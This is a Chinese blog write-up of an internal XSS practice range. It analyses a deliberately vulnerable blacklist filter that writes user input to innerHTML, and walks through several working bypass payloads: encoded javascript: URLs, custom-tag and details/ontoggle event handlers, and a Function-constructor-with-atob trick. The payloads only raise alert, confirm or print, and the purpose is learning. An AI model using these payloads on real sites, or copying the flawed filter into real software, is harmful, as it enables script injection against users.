<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;a href=&quot;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x36;&amp;#x25;&amp;#x33;&amp;#x31;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x36;&amp;#x25;&amp;#x36;&amp;#x33;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x36;&amp;#x25;&amp;#x33;&amp;#x35;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x37;&amp;#x25;&amp;#x33;&amp;#x32;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x37;&amp;#x25;&amp;#x33;&amp;#x34;&amp;#x28;&amp;#x27;&amp;#x78;&amp;#x73;&amp;#x73;&amp;#x27;&amp;#x29;&quot;&gt;test&lt;/a&gt;<br></code></pre></td></tr></table></figure>



<p>但是这肯定不是老大想考我们的点</p>
<h1 id="其他师傅的payload"><a href="#其他师傅的payload" class="headerlink" title="其他师傅的payload"></a>其他师傅的payload</h1><p>去看看每关payload再看看源码，揣摩一下考点吧</p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/jpeg/52636441/1741355814140-c4be443f-8b55-4361-a015-bb86013c78f6.jpeg" srcset="/img/loading.gif" lazyload alt="img"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plain">payload1:JavAscRipt%3A%2F%2a%3A%2F%2F%2a%2Fprint%28%29%3B%2F%2F<br>payload2:&lt;testtest id=abcd onclick=confirm`111` tabindex=1&gt;#abcd<br>payload3:&lt;form&gt;&lt;button/formaction=javascr&amp;Tab;ipt:alert&amp;#x28;)&gt;1<br>payload4:&lt;details/ontoggle=&quot;``.constructor.constructor`a$&#123;atob`YWxlcnQoJ3hzcycp`&#125;```&quot;/open&gt;<br></code></pre></td></tr></table></figure>

<p>哈哈看起来第一关省略了</p>
<h1 id="第二关（解）"><a href="#第二关（解）" class="headerlink" title="第二关（解）"></a>第二关（解）</h1><p>直接看看第二关</p>
<p>卧槽，挂，怎么视觉效果比我想的nb这么多</p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741356230424-26def6b9-7d02-4cd2-8242-c78d87c1df9a.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="分析-1"><a href="#分析-1" class="headerlink" title="分析"></a>分析</h2><p>payload url解码过后：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">JavAscRipt:/*://*/print();//<br></code></pre></td></tr></table></figure>

<p><strong>使用的是&#x2F;*<em>&#x2F;注释了:&#x2F;&#x2F;,这样既有了:&#x2F;&#x2F;又不会有:&#x2F;&#x2F;的影响，后面print()函数，</em>***触发浏览器的打印对话框，用于打印当前网页内容</strong></p>
<p>当然这个print也可以用unicode编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">JavAscRipt:/*://*/\u0070\u0072\u0069\u006e\u0074``;//<br></code></pre></td></tr></table></figure>



<h1 id="第三关-解"><a href="#第三关-解" class="headerlink" title="第三关(解)"></a>第三关(解)</h1><p>第三关，上面分析了一些（技术太菜了，不能讲明白）</p>
<p>直接看看payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;testtest id=abcd onclick=confirm`111` tabindex=1&gt;#abcd<br></code></pre></td></tr></table></figure>



<h2 id="分析-2"><a href="#分析-2" class="headerlink" title="分析"></a>分析</h2><p>这个应该是自定义tag吧</p>
<p>b站这个视频讲了</p>
<p><strong>【第十一课 - XSS 自定义TAG】</strong><a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1vF411e7Td?vd_source=4c17d2bbeb86e49d4cd2075b8b8dd308"><strong>https://www.bilibili.com/video/BV1vF411e7Td?vd_source&#x3D;4c17d2bbeb86e49d4cd2075b8b8dd308</strong></a></p>
<p><strong>这个onclick 也是on*系列，那么后面的comfirm也可以换成unicode编码</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;testtest id=abcd onclick=\u0063\u006f\u006e\u0066\u0069\u0072\u006d`111` tabindex=1&gt;#abcd<br></code></pre></td></tr></table></figure>

<p><strong>当然自定义tag我们还可以用其他函数，比如第二关的print()</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;testtest id=abcd onclick=print``; tabindex=1&gt;#abcd<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741357599928-38d3e4a1-f561-4890-86f7-1a55dd3fe90b.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><strong>那么还可以换其他属性比如 onmouseover</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;testtest id=abcd onmouseover=\u0063\u006f\u006e\u0066\u0069\u0072\u006d`111` tabindex=1&gt;#abcd<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741357737118-e0c9ef2d-4dfd-4305-be6e-c55eed4556fe.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h1 id="第四关："><a href="#第四关：" class="headerlink" title="第四关："></a>第四关：</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;script&gt;<br>       /**<br>        * 这里的黑名单包含常见关键字和事件。<br>        * 任何匹配到的内容都会在字符串中被移除。<br>        * 仅用于演示，黑名单过滤并不绝对安全。<br>        */<br>       const blackList = [<br>           &#x27;&lt;script&#x27;, &#x27;&lt;/script&#x27;, &#x27;onload=&#x27;, &#x27;onerror=&#x27;,<br>           &#x27;prompt(&#x27;, &#x27;confirm(&#x27;,<br>           &#x27;data:&#x27;, &#x27;vbscript:&#x27;, &#x27;javascript:&#x27;, &#x27;eval(&#x27;, &#x27;&quot;javascript&quot;&#x27;,&#x27;alert(&#x27;,&#x27;(&#x27;,&#x27;onclick&#x27;,&#x27;confirm&#x27;,<br>           &#x27;href&#x27;,&#x27;src&#x27;// 注意同时含双引号<br>       ];<br><br>       /**<br>        * 扩展过滤函数：移除所有黑名单中的内容，并记录移除情况。<br>        * @param &#123;string&#125; str 用户输入<br>        * @return &#123;&#123;safe: string, removedItems: string[]&#125;&#125; 过滤后的字符串，以及移除详情<br>        */<br>       function extendedXSSFilter(str) &#123;<br>           if (!str) &#123;<br>               return &#123;<br>                   safe: &#x27;&#x27;,<br>                   removedItems: []<br>               &#125;;<br>           &#125;<br><br>           let safe = str;<br>           let lower = safe.toLowerCase();<br>           const removedItems = [];<br><br>           // 遍历每个关键字，持续查找并移除<br>           blackList.forEach(keyword =&gt; &#123;<br>               let count = 0;<br>               while (lower.includes(keyword)) &#123;<br>                   count++;<br>                   const idx = lower.indexOf(keyword);<br>                   safe = safe.substring(0, idx) + safe.substring(idx + keyword.length);<br>                   lower = safe.toLowerCase();<br>               &#125;<br>               if (count &gt; 0) &#123;<br>                   removedItems.push(`$&#123;keyword&#125; ×$&#123;count&#125;`);<br>               &#125;<br>           &#125;);<br><br>           return &#123;<br>               safe,<br>               removedItems<br>           &#125;;<br>       &#125;<br><br>       function submitInput() &#123;<br>           const userValue = document.getElementById(&#x27;userInput&#x27;).value;<br><br>           // 过滤并收集被移除的关键字<br>           const &#123; safe, removedItems &#125; = extendedXSSFilter(userValue);<br><br>           // 使用 innerHTML 故意保留潜在 XSS 漏洞（若仍可绕过黑名单）<br>           document.getElementById(&#x27;output&#x27;).innerHTML = safe;<br><br>           // 展示被移除的关键字<br>           const removedBox = document.getElementById(&#x27;removed&#x27;);<br>           if (removedItems.length === 0) &#123;<br>               removedBox.textContent = &#x27;无&#x27;;<br>           &#125; else &#123;<br>               removedBox.textContent = removedItems.join(&#x27;, &#x27;);<br>           &#125;<br><br>           // 控制台调试信息<br>           console.log(&#x27;过滤后的结果:&#x27;, safe);<br>           console.log(&#x27;移除的关键字:&#x27;, removedItems);<br>       &#125;co<br></code></pre></td></tr></table></figure>

<p>好像是多禁了一个confirm？</p>
<h2 id="分析-3"><a href="#分析-3" class="headerlink" title="分析"></a>分析</h2><p>看看payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;form&gt;&lt;button/formaction=javascr&amp;Tab;ipt:alert&amp;#x28;)&gt;1<br></code></pre></td></tr></table></figure>

<p>这个button为什么没有闭合呢？？？我不知道啊，果然师傅们的手法很多啊，问了一下d指导</p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741358237032-d039103f-27b5-4366-bcc4-e064f9680eba.png" srcset="/img/loading.gif" lazyload alt="img"><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741358241881-3d94a772-074b-429f-b02e-f37b4b7a3eda.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>大概懂了，浏览器的一种补偿机制，会知道怎么补齐，哈哈但是我还是不会用，看来还是不太懂底层逻辑</p>
<p>然后javascript和()的处理，易师傅采用的是html实体化编码。太帅的payload了。</p>
<h1 id="第五关："><a href="#第五关：" class="headerlink" title="第五关："></a>第五关：</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;details/ontoggle=&quot;``.constructor.constructor`a$&#123;atob`YWxlcnQoJ3hzcycp`&#125;```&quot;/open&gt;<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741358551524-18f169a2-e2c4-4224-b25c-a7b514f3a9ad.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>怎么也这么nb，看看源码吧</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;script&gt;<br>    /**<br>     * 这里的黑名单包含常见关键字和事件。<br>     * 任何匹配到的内容都会在字符串中被移除。<br>     * 仅用于演示，黑名单过滤并不绝对安全。<br>     */<br>    const blackList = [<br>        &#x27;&lt;script&#x27;, &#x27;&lt;/script&#x27;, &#x27;onload=&#x27;, &#x27;onerror=&#x27;,<br>        &#x27;prompt(&#x27;, &#x27;confirm(&#x27;,<br>        &#x27;data:&#x27;, &#x27;vbscript:&#x27;, &#x27;javascript:&#x27;, &#x27;eval(&#x27;, &#x27;&quot;javascript&quot;&#x27;,&#x27;alert(&#x27;,&#x27;(&#x27;,&#x27;onclick&#x27;,&#x27;confirm&#x27;,<br>        &#x27;href&#x27;,&#x27;src&#x27;// 注意同时含双引号<br>    ];<br><br>    /**<br>     * 扩展过滤函数：移除所有黑名单中的内容，并记录移除情况。<br>     * @param &#123;string&#125; str 用户输入<br>     * @return &#123;&#123;safe: string, removedItems: string[]&#125;&#125; 过滤后的字符串，以及移除详情<br>     */<br>    function extendedXSSFilter(str) &#123;<br>        if (!str) &#123;<br>            return &#123;<br>                safe: &#x27;&#x27;,<br>                removedItems: []<br>            &#125;;<br>        &#125;<br><br>        let safe = str;<br>        let lower = safe.toLowerCase();<br>        const removedItems = [];<br><br>        // 遍历每个关键字，持续查找并移除<br>        blackList.forEach(keyword =&gt; &#123;<br>            let count = 0;<br>            while (lower.includes(keyword)) &#123;<br>                count++;<br>                const idx = lower.indexOf(keyword);<br>                safe = safe.substring(0, idx) + safe.substring(idx + keyword.length);<br>                lower = safe.toLowerCase();<br>            &#125;<br>            if (count &gt; 0) &#123;<br>                removedItems.push(`$&#123;keyword&#125; ×$&#123;count&#125;`);<br>            &#125;<br>        &#125;);<br><br>        return &#123;<br>            safe,<br>            removedItems<br>        &#125;;<br>    &#125;<br><br>    function submitInput() &#123;<br>        const userValue = document.getElementById(&#x27;userInput&#x27;).value;<br><br>        // 过滤并收集被移除的关键字<br>        const &#123; safe, removedItems &#125; = extendedXSSFilter(userValue);<br><br>        // 使用 innerHTML 故意保留潜在 XSS 漏洞（若仍可绕过黑名单）<br>        document.getElementById(&#x27;output&#x27;).innerHTML = safe;<br><br>        // 展示被移除的关键字<br>        const removedBox = document.getElementById(&#x27;removed&#x27;);<br>        if (removedItems.length === 0) &#123;<br>            removedBox.textContent = &#x27;无&#x27;;<br>        &#125; else &#123;<br>            removedBox.textContent = removedItems.join(&#x27;, &#x27;);<br>        &#125;<br><br>        // 控制台调试信息<br>        console.log(&#x27;过滤后的结果:&#x27;, safe);<br>        console.log(&#x27;移除的关键字:&#x27;, removedItems);<br>    &#125;<br>&lt;/script&gt;<br></code></pre></td></tr></table></figure>

<p>没看出来哪限制了，第四关payload依然可打</p>
<h2 id="分析-4"><a href="#分析-4" class="headerlink" title="分析"></a>分析</h2><p>先分析一下lagom师傅的payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;details <br>  open <br>  ontoggle=&quot;``.constructor.constructor`a$&#123;atob`YWxlcnQoJ3hzcycp`&#125;```&quot;<br>&gt;&lt;/details&gt;<br></code></pre></td></tr></table></figure>

<p>原型代码，lagom师傅的payload应该也用到了浏览器的补偿机制。</p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arduino">&lt;details open&gt;利用 open 属性自动触发 ontoggle 事件，无需用户交互<br></code></pre></td></tr></table></figure>



<figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs autohotkey">\```.constructor.constructor`<br>等价于 `Function.constructor` → 获取 `Function` 构造函数<br></code></pre></td></tr></table></figure>



<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-comment">// 原型链追溯</span><br><span class="hljs-string">&#x27;&#x27;</span>.<span class="hljs-property">constructor</span> → <span class="hljs-title class_">String</span>  <br><span class="hljs-title class_">String</span>.<span class="hljs-property">constructor</span> → <span class="hljs-title class_">Function</span><br><span class="hljs-string">`a<span class="hljs-subst">$&#123;atob<span class="hljs-string">`YWxlcnQoJ3hzcycp`</span>&#125;</span>`</span> <br><span class="hljs-comment">// 解码步骤：</span><br><span class="hljs-title function_">atob</span>(<span class="hljs-string">&#x27;YWxlcnQoJ3hzcycp&#x27;</span>) → <span class="hljs-string">&#x27;alert(\&#x27;xss\&#x27;)&#x27;</span><br><span class="hljs-comment">// 最终拼接结果：</span><br><span class="hljs-title class_">Function</span><span class="hljs-string">`a<span class="hljs-subst">$&#123;<span class="hljs-string">&#x27;alert(1)&#x27;</span>&#125;</span>`</span><span class="hljs-string">``</span> <br><span class="hljs-comment">// 等效于：</span><br><span class="hljs-keyword">new</span> <span class="hljs-title class_">Function</span>(<span class="hljs-string">&#x27;alert(1)&#x27;</span>)()<br></code></pre></td></tr></table></figure>

<p><strong>Tagged templates 机制</strong><br>浏览器会将模板字符串分割为参数数组：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-title class_">Function</span>([<span class="hljs-string">&#x27;a&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>], <span class="hljs-string">&#x27;alert(1)&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>看都看不懂。D指导解释了我都看不懂</p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741359195467-b74f5509-1cd8-494b-820c-0a096efb405c.png" srcset="/img/loading.gif" lazyload alt="img"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8-%E6%89%93%E9%9D%B6/" class="print-no-link">#网络安全(打靶)</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>xss打靶(团队内部靶场)</div>
      <div>http://example.com/2025/03/08/xss打靶-团队内部靶场/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>March 8, 2025</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/03/07/hello-world/" title="Hello World">
                        <span class="hidden-mobile">Hello World</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
